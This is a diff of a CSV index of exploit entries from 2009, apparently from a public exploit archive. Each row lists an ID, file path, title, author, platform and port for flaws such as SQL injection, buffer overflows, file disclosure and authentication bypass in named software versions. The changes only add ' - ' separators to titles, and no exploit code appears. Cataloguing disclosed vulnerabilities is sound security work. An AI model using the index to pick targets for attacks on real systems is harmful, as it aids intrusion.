-8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 +8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Remote Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - (profile.php user_id) SQL Injection",2009-05-26,Qabandi,php,webapps,0 @@ -8295,12 +8295,12 @@ id,file,description,date,author,platform,type,port 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",php,webapps,0 8796,platforms/php/webapps/8796.htm,"Gallarific - (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 -8798,platforms/windows/dos/8798.rb,"Safari RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 +8798,platforms/windows/dos/8798.rb,"Safari - RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 8799,platforms/windows/local/8799.txt,"PHP 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injection",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Auth Bypass) SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 -8804,platforms/windows/remote/8804.py,"Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 +8804,platforms/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Perl)",2009-05-26,ka0x,windows,remote,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 @@ -8328,7 +8328,7 @@ id,file,description,date,author,platform,type,port 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Auth Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 -8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BoF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 +8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote BoF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote BoF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 @@ -8361,7 +8361,7 @@ id,file,description,date,author,platform,type,port 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Auth Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0 -8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 +8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla Component Seminar 1.28 - (id) Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - (index.php noticia) SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 @@ -8376,7 +8376,7 @@ id,file,description,date,author,platform,type,port 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 -8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 +8881,platforms/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Auth Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 @@ -8388,9 +8388,9 @@ id,file,description,date,author,platform,type,port 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - (category) SQL Injection",2009-06-08,OzX,php,webapps,0 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - (cid) SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - (cid) SQL Injection",2009-06-08,OzX,php,webapps,0 -8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 +8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 8896,platforms/osx/local/8896.c,"Apple MACOS X xnu 1228.9.59 - Local Kernel Root Exploit",2009-06-08,mu-b,osx,local,0 -8897,platforms/windows/remote/8897.c,"httpdx 0.8 FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 +8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) - LFI",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 @@ -8430,7 +8430,7 @@ id,file,description,date,author,platform,type,port 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection/XSS",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 - (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 -8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 +8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 @@ -8439,7 +8439,7 @@ id,file,description,date,author,platform,type,port 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 - (SQL/XSS) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 -8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e Remote Code Execution",2009-06-15,USH,php,webapps,0 +8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution Exploit",2009-06-15,SirGod,php,webapps,0 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 @@ -8453,7 +8453,7 @@ id,file,description,date,author,platform,type,port 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - (id) SQL Injection",2009-06-15,Kacper,php,webapps,0 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0 -8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 +8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0 8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 @@ -8513,7 +8513,7 @@ id,file,description,date,author,platform,type,port 9026,platforms/php/webapps/9026.txt,"WHOISCART - (Auth Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla Component com_php - (id) Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 -9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BoF PoC",2009-06-29,Trancer,windows,dos,0 +9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - smb:// URI Stack BoF PoC",2009-06-29,Trancer,windows,dos,0 9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote BoF Exploit (SEH)",2009-06-29,His0k4,windows,remote,19810 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 @@ -8547,7 +8547,7 @@ id,file,description,date,author,platform,type,port 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 - Insecure Cookie Handling",2009-07-01,Stack,php,webapps,0 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst / .m3u) Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 -9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 +9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 @@ -8594,7 +8594,7 @@ id,file,description,date,author,platform,type,port 9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injection",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 -9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 +9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - (.rws Parsing) Buffer Overflow PoC",2009-07-10,LiquidWorm,windows,dos,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - (WindsPly.ocx) Remote BoF PoC",2009-07-10,shinnai,windows,dos,0 @@ -8638,10 +8638,10 @@ id,file,description,date,author,platform,type,port 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,"Khashayar Fereidani",php,webapps,0 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow PoC",2009-07-15,"ThE g0bL!N",windows,dos,0 -9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC",2009-07-15,"Andrew Haynes",windows,dos,0 +9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 - unicode Remote Buffer Overflow PoC",2009-07-15,"Andrew Haynes",windows,dos,0 9159,platforms/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers - Denial of Service",2009-07-15,"Thierry Zoller",multiple,dos,0 -9161,platforms/php/webapps/9161.txt,"Admin News Tools Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 +9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - (profile.php) SQL Injection",2009-07-15,Arka69,php,webapps,0 9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) - ActiveX BoF PoC",2009-07-16,anonymous,windows,dos,0 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 @@ -8655,7 +8655,7 @@ id,file,description,date,author,platform,type,port 9172,platforms/windows/local/9172.pl,"Hamster Audio Player 0.3a - Universal Buffer Overflow Exploit (SEH)",2009-07-16,"ThE g0bL!N",windows,local,0 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - (.pst / .m3u) Heap Overflow PoC",2009-07-16,hack4love,windows,dos,0 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 -9175,platforms/multiple/dos/9175.txt,"Sguil/PADS Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 +9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 9176,platforms/php/webapps/9176.txt,"dB Masters Multimedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Universal BoF Exploit",2009-07-16,Crazy_Hacker,windows,local,0 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - (.mp3) Crash Exploit",2009-07-16,prodigy,windows,dos,0 @@ -8712,11 +8712,11 @@ id,file,description,date,author,platform,type,port 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Auth Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla Component com_joomloads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Remote File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 -9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 +9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 -9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 +9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection",2009-07-24,skys,php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit (osx)",2009-07-24,Dr_IDE,osx,remote,0 @@ -8774,10 +8774,10 @@ id,file,description,date,author,platform,type,port 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (Win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - (.xbm) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0 -9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f smb:// URI Handling Remote BoF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 +9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f - smb:// URI Handling Remote BoF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0 9305,platforms/windows/local/9305.txt,"EPSON Status Monitor 3 - Local Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local,0 -9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 +9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc - MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0 9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion",2009-07-30,SirGod,php,webapps,0 9309,platforms/php/webapps/9309.txt,"orbis CMS 1.0 - (afd/adf/asu/SQL) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 @@ -8790,7 +8790,7 @@ id,file,description,date,author,platform,type,port 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - (.skp) Remote Stack Overflow PoC",2009-08-01,LiquidWorm,windows,dos,0 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f - smb:// URI Handling Remote BoF Exploit (Univ)",2009-07-31,His0k4,windows,remote,0 -9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BoF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 +9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote BoF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0 @@ -8890,8 +8890,8 @@ id,file,description,date,author,platform,type,port 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injection",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit",2009-08-12,IHTeam,php,webapps,0 -9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit",2009-08-13,zec,windows,local,0 -9427,platforms/windows/dos/9427.py,"VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BoF PoC",2009-08-13,Dr_IDE,windows,dos,0 +9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow Exploit",2009-08-13,zec,windows,local,0 +9427,platforms/windows/dos/9427.py,"VLC Media Player 1.0.0/1.0.1 - smb:// URI Handling BoF PoC",2009-08-13,Dr_IDE,windows,dos,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - (.PLS /.PL) Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 @@ -8912,7 +8912,7 @@ id,file,description,date,author,platform,type,port 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 -9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 +9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - tgbvpn.sys Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"Dreampics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -8983,7 +8983,7 @@ id,file,description,date,author,platform,type,port 9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS",2009-08-25,"Francis Provencher",windows,dos,0 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - (video.php movie) SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0 -9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 +9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)",2009-08-26,"Clément Lecigne",linux,local,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,"cr4wl3r ",php,webapps,0 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 @@ -9046,7 +9046,7 @@ id,file,description,date,author,platform,type,port 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,"cr4wl3r ",php,webapps,0 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote BoF PoC (1)",2009-09-03,"expose 0day",windows,dos,0 9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote BoF PoC (2)",2009-09-03,"expose 0day",windows,dos,0 -9586,platforms/windows/remote/9586.py,"SIDVault 2.0e Windows Remote Buffer Overflow Exploit",2009-09-03,blake,windows,remote,389 +9586,platforms/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow Exploit",2009-09-03,blake,windows,remote,389 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - (catid) Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 9589,platforms/windows/local/9589.pl,"OTSTurntables 1.00.027 - (.m3u/ofl) Local Universal BoF Exploit (SEH)",2009-09-04,hack4love,windows,local,0 @@ -9067,7 +9067,7 @@ id,file,description,date,author,platform,type,port 9604,platforms/php/webapps/9604.txt,"Joomla Component com_joomloc - (id) SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution Exploit",2009-09-09,StAkeR,php,webapps,0 9606,platforms/windows/dos/9606.pl,"Safari 3.2.3 - (Win32) JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 -9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 +9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String PoC",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow Exploit",2009-09-09,"Jeremy Brown",linux,local,0 9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9610,platforms/windows/local/9610.py,"Audio Lib Player - (.m3u) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 @@ -9104,26 +9104,26 @@ 